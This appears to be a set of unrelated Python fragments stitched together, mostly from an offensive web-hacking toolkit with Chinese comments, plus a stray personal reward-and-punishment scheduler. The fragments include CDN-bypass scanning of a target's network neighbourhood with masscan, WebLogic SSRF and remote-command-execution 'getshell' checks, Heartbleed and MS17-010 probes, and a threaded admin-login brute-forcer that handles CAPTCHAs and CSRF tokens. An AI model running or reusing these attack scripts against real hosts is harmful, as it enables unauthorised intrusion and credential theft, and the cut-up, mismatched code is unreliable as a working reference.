def check_if_mx_c_machines_has_actual_ip_of_domain(self):
# 检测domain的mx记录所在ip[或ip列表]的c段中有没有domain的真实ip
# 有则返回真实ip,没有则返回0
CLIOutput().good_print("尝试从mx记录的c段中查找是否存在%s的真实ip" % self.domain)
ip_list = self.get_ip_from_mx_record()
if ip_list != []:
for each_ip in ip_list:
result = self.check_if_ip_c_machines_has_actual_ip_of_domain(
each_ip)
if result != 0:
return result
else:
continue
return 0
def get_actual_ip_from_domain(self):
# 尝试获得domain背后的真实ip,前提是domain有cdn
# 如果找到了则返回ip,如果没有找到返回0
CLIOutput().good_print("进入获取真实ip函数,认为每个domain都是有cdn的情况来处理")
import socket
has_cdn_value = self.domain_has_cdn()
if has_cdn_value['has_cdn'] == 1:
CLIOutput().good_print("检测到domain:%s的A记录不止一个,认为它有cdn" %
self.domain)
pass
else:
CLIOutput().good_print(
"Attention...!!! Domain doesn't have cdn,I will return the only one ip"
)
true_ip = socket.gethostbyname_ex(self.domain)[2][0]
return true_ip
# 下面尝试通过cloudflare在线查询真实ip接口获取真实ip
if has_cdn_value['is_cloud_flare'] == 1:
ip_value = self.get_ip_value_from_online_cloudflare_interface()
if ip_value != 0:
return ip_value
else:
pass
# 下面尝试通过可能存在的phpinfo页面获得真实ip
ip_from_phpinfo = self.get_domain_actual_ip_from_phpinfo()
if ip_from_phpinfo == 0:
pass
else:
return ip_from_phpinfo
# 下面通过mx记录来尝试获得真实ip
result = self.check_if_mx_c_machines_has_actual_ip_of_domain()
if result == 0:
pass
else:
return result
print("很遗憾,在下认为%s有cdn,但是目前在下的能力没能获取它的真实ip,当前函数将返回0" % self.domain)
return 0
def get_c_80_or_443_list(self, ip):
# 得到ip的整个c段的开放80端口或443端口的ip列表
if "not found" in get_string_from_command("masscan"):
#这里不用nmap扫描,nmap扫描结果不准
os.system("apt-get install masscan")
if self.http_or_https == "http":
scanPort = 80
CLIOutput().good_print("现在进行%s的c段开了80端口机器的扫描" % ip)
if self.http_or_https == "https":
scanPort = 443
CLIOutput().good_print("现在进行%s的c段开了443端口机器的扫描" % ip)
masscan_command = "masscan -p%d %s/24 > /tmp/masscan.out" % (scanPort,
ip)
os.system(masscan_command)
with open("/tmp/masscan.out", "r+") as f:
strings = f.read()
#os.system("rm /tmp/masscan.out")
import re
allIP = re.findall(r"((\d{1,3}\.){3}\d{1,3})", strings)
ipList = []
for each in allIP:
ipList.append(each[0])
print(ipList)
return ipList
def check(url):
#print("正在检测第%d个url:%s" % (status_num,url))
vuln_url = url + check_addr
rsp = requests.get(vuln_url, verify=False, timeout=10)
if rsp.status_code == 200:
content = rsp.content
import chardet
bytes_encoding = chardet.detect(content)['encoding']
content = content.decode(bytes_encoding)
if re.search(r"127\.0\.0\.1", content, re.I):
string_to_write = "Congratulations! uddiexplorer/SearchPublicRegistries漏洞存在:\n" + vuln_url + "\n"
CLIOutput().good_print(string_to_write)
with open("%s/result.txt" % current_dir, "a+") as f:
f.write(string_to_write)
else:
print(content.status_code)
def check_if_ip_is_actual_ip_of_domain(self, ip):
# 通过修改hosts文件检测ip是否是domain对应的真实ip
# 如果是则返回True,否则返回False
CLIOutput().good_print(
"现在通过修改hosts文件并刷新dns的方法检测ip:%s是否是domain:%s的真实ip" %
(ip, self.domain))
os.system("cp /etc/hosts /etc/hosts.bak")
self.modify_hosts_file_with_ip_and_domain(ip)
self.flush_dns()
hosts_changed_domain_title = get_request(
self.http_or_https + "://%s" % self.domain,
'seleniumPhantomJS')['title']
os.system("rm /etc/hosts && mv /etc/hosts.bak /etc/hosts")
#这里要用title判断,html判断不可以,title相同则认为相同
if self.domain_title == hosts_changed_domain_title:
print("是的!!!!!!!!!!!!")
return True
else:
print("不是的!!!!!!!!!!!!")
return False
def check(url):
#print("正在检测第%d个url:%s" % (status_num,url))
vuln_url = url + check_addr
content = requests.get(vuln_url, verify=False, timeout=10)
if content.status_code == 200:
rsp = requests.post(vuln_url, headers=heads, data=post_str.encode(
"utf-8"), verify=False, timeout=10)
content = rsp.content
import chardet
bytes_encoding = chardet.detect(content)['encoding']
content = content.decode(bytes_encoding)
if re.search(r"java\.lang\.ProcessBuilder", content, re.I):
# print "getshell success,shell is:%s"%(url+shell_addr)
string_to_write = "Congratulations! weblogic 远程命令执行漏洞存在:\n" + url + shell_addr + "\n"
CLIOutput().good_print(string_to_write)
with open("%s/result.txt" % current_dir, "a+") as f:
f.write(string_to_write)
else:
print("失败")
else:
print(content.status_code)
from exp10it import COMMON_NOT_WEB_PORT_LIST
from exp10it import get_http_domain_from_url
from exp10it import get_target_open_port_list
current_dir = os.path.split(os.path.realpath(__file__))[0]
target = sys.argv[1]
print("checking heartbleed vul for " + target)
open_port_list = get_target_open_port_list(target)
http_domain = get_http_domain_from_url(target)
hostname = urlparse(target).hostname
target_table_name = get_target_table_name_list(target)[0]
parsed = urlparse(target)
open_port_list = get_target_open_port_list(target)
if ":" in parsed.netloc:
open_port_list.append(parsed.netloc.split(":")[1])
for each in open_port_list:
if each not in COMMON_NOT_WEB_PORT_LIST:
a = get_string_from_command("cd %s && python2 ssltest.py -p %s %s " %
(current_dir, each, hostname))
if re.search(r"server is vulnerable", a, re.I):
string_to_write = "Congratulations! heartbleed vul exists on %s:%s" % (
hostname, each)
CLIOutput().good_print(string_to_write)
with open("%s/result.txt" % current_dir, "a+") as f:
f.write(string_to_write)
else:
print(
"coz I found no nmap scan result from database,I will not run heartbleed vul check module on other ports"
)
import re
import os
import sys
exp10it_module_path = os.path.expanduser("~") + "/exp10it"
sys.path.insert(0, exp10it_module_path)
import time
from urllib.parse import urlparse
from exp10it import CLIOutput
target = sys.argv[1]
print("checking ms17-010 vul for " + target)
current_dir = os.path.split(os.path.realpath(__file__))[0]
current_log_file = "/tmp/commix_" + str(time.time())
if target[:4] == "http":
target = urlparse(target).hostname
if not os.path.exists("%s/smb-vuln-ms17-010.nse" % current_dir):
os.system(
"cd %s && wget https://raw.githubusercontent.com/cldrn/nmap-nse-scripts/master/scripts/smb-vuln-ms17-010.nse"
% current_dir)
cmd = "nmap --script=%s/smb-vuln-ms17-010.nse %s 2>&1 | tee %s" % (
current_dir, target, current_log_file)
a = os.system(cmd)
with open(current_log_file, "r+") as f:
log_str = f.read()
if re.search(r"VULNERABLE", log_str, re.I):
os.system("mv %s %s/result.txt" % (current_log_file, current_dir))
CLIOutput().good_print("Congratulations! MS10-010 exists on %s" % target)
else:
os.system("rm %s" % current_log_file)
printString="["+startTime+"-"+endTime+" 正在进行:"+each[2]+"]"
t=MyThread(output.continue_bottom_print,(printString,))
t.start()
hasPrintStatusTimeZoneList.append(todayDate+":"+startTime+"-"+endTime)
if endTime == now:
if todayDate+"'"+now not in saidNowEndList:
os.system("say '注意,现在结束%s'" % each[2])
#output.bottom_print("\r"+" "*len(printString))
output.bottom_print("[完成'%s']" % each[2])
#sys.stdout.flush()
output.stop_order=1
saidNowEndList.append(todayDate+"'"+now)
output = CLIOutput()
jiangli = ["今日dj", "本周2次dj", "可以买一个礼物给家人", "可以买一本好书给自己", "可以获得一次抵消惩罚的机会",
"明天完成main后可以自由娱乐或其他安排", "周末可以自由安排", "增加可购买想要的东西的基金200元"]
chengfa = ["周末Ndj", "周末全部时间用来学习,禁止娱乐", "周末全部时间用来练习五笔", "周末全部时间用来背单词", "周末背2000个单词后才可以休息, 否则不能进行任意娱乐", "减少基金200元"]
jiangliIndex = random.randint(0, len(jiangli) - 1)
chengfaIndex = random.randint(0, len(chengfa) - 1)
while 1:
import time
nowYear = time.strftime("%y")
nowMonth = time.strftime("%m")
nowDate = time.strftime("%d")
todayDate = nowYear + nowMonth + nowDate
choose = input('''请输入你遇到的问题:
1.效率不高
def crack_admin_login_url_thread(url,username,password):
if get_flag[0] == 1:
return
try_time[0] += 1
if requestAction=="GET":
final_request_url=form_action_url
final_request_url=re.sub(r"%s=[^&]*" % user_form_name,"%s=%s" %
(user_form_name,username),final_request_url)
final_request_url=re.sub(r"%s=[^&]*" % pass_form_name,"%s=%s" %
(pass_form_name,password),final_request_url)
if has_yanzhengma[0]:
if needOnlyGetOneYanZhengMa:
yanzhengmaValue=onlyOneYanZhengMaValue
else:
yanzhengmaValue=get_one_valid_yangzhengma_from_src(yanzhengma_src)
final_request_url=re.sub(r"%s=[^&]*" % yanzhengma_form_name,"%s=%s" %
(yanzhengma_form_name,yanzhengmaValue),final_request_url)
if hasCsrfToken:
final_request_url=re.sub(r"%s=[^&]*" % csrfTokenName,currentCsrfTokenPart[0],final_request_url)
html=s.get(final_request_url).text
if hasCsrfToken:
csrfTokenValue=get_csrf_token_value_from_html(html)
currentCsrfTokenPart[0]=csrfTokenPart+csrfTokenValue
else:
#post request
paramPartValue=form_action_url.split("^")[1]
paramList=paramPartValue.split("&")
values={}
for eachP in paramList:
eachPList=eachP.split("=")
eachparamName=eachPList[0]
eachparamValue=eachPList[1]
if eachparamName==user_form_name:
eachparamValue=username
if eachparamName==pass_form_name:
eachparamValue=password
values[eachparamName]=eachparamValue
if has_yanzhengma[0]:
if not needOnlyGetOneYanZhengMa:
values[yanzhengma_form_name]=get_one_valid_yangzhengma_from_src(yanzhengma_src)
else:
values[yanzhengma_form_name]=onlyOneYanZhengMaValue
if hasCsrfToken:
values[csrfTokenName]=re.search(r"[^=]+=(.*)",currentCsrfTokenPart[0]).group(1)
html = s.post(form_action_url.split("^")[0], values).text
if hasCsrfToken:
csrfTokenValue=get_csrf_token_value_from_html(html)
currentCsrfTokenPart[0]=csrfTokenPart+csrfTokenValue
USERNAME_PASSWORD = "******" + username + ":" + \
password + ")" + (52 - len(password)) * " "
# 每100次计算完成任务的平均速度
left_time = get_remain_time(
start[0],
biaoji_time[0],
remain_time[0],
100,
try_time[0],
sum[0])
remain_time[0] = left_time
sys.stdout.write('-' * (try_time[0] * 100 // sum[0]) + '>' + str(try_time[0] * 100 // sum[0]) +
'%' + ' %s/%s remain time:%s %s\r' % (try_time[0], sum[0], remain_time[0], USERNAME_PASSWORD))
sys.stdout.flush()
if len(html) > logined_least_length:
# 认为登录成功
get_flag[0] = 1
end = time.time()
CLIOutput().good_print(
"congratulations!!! admin login url cracked succeed!!!", "red")
string = "cracked admin login url:%s username and password:(%s:%s)" % (
url, username, password)
CLIOutput().good_print(string, "red")
return_string[0]=string
print("you spend time:" + str(end - start[0]))
http_domain_value = get_http_domain_from_url(url)
# 经验证terminate()应该只能结束当前线程,不能达到结束所有线程
table_name_list = get_target_table_name_list(http_domain_value)
urls_table_name = http_domain_value.split(
"/")[-1].replace(".", "_") + "_urls"
return {'username': username, 'password': password}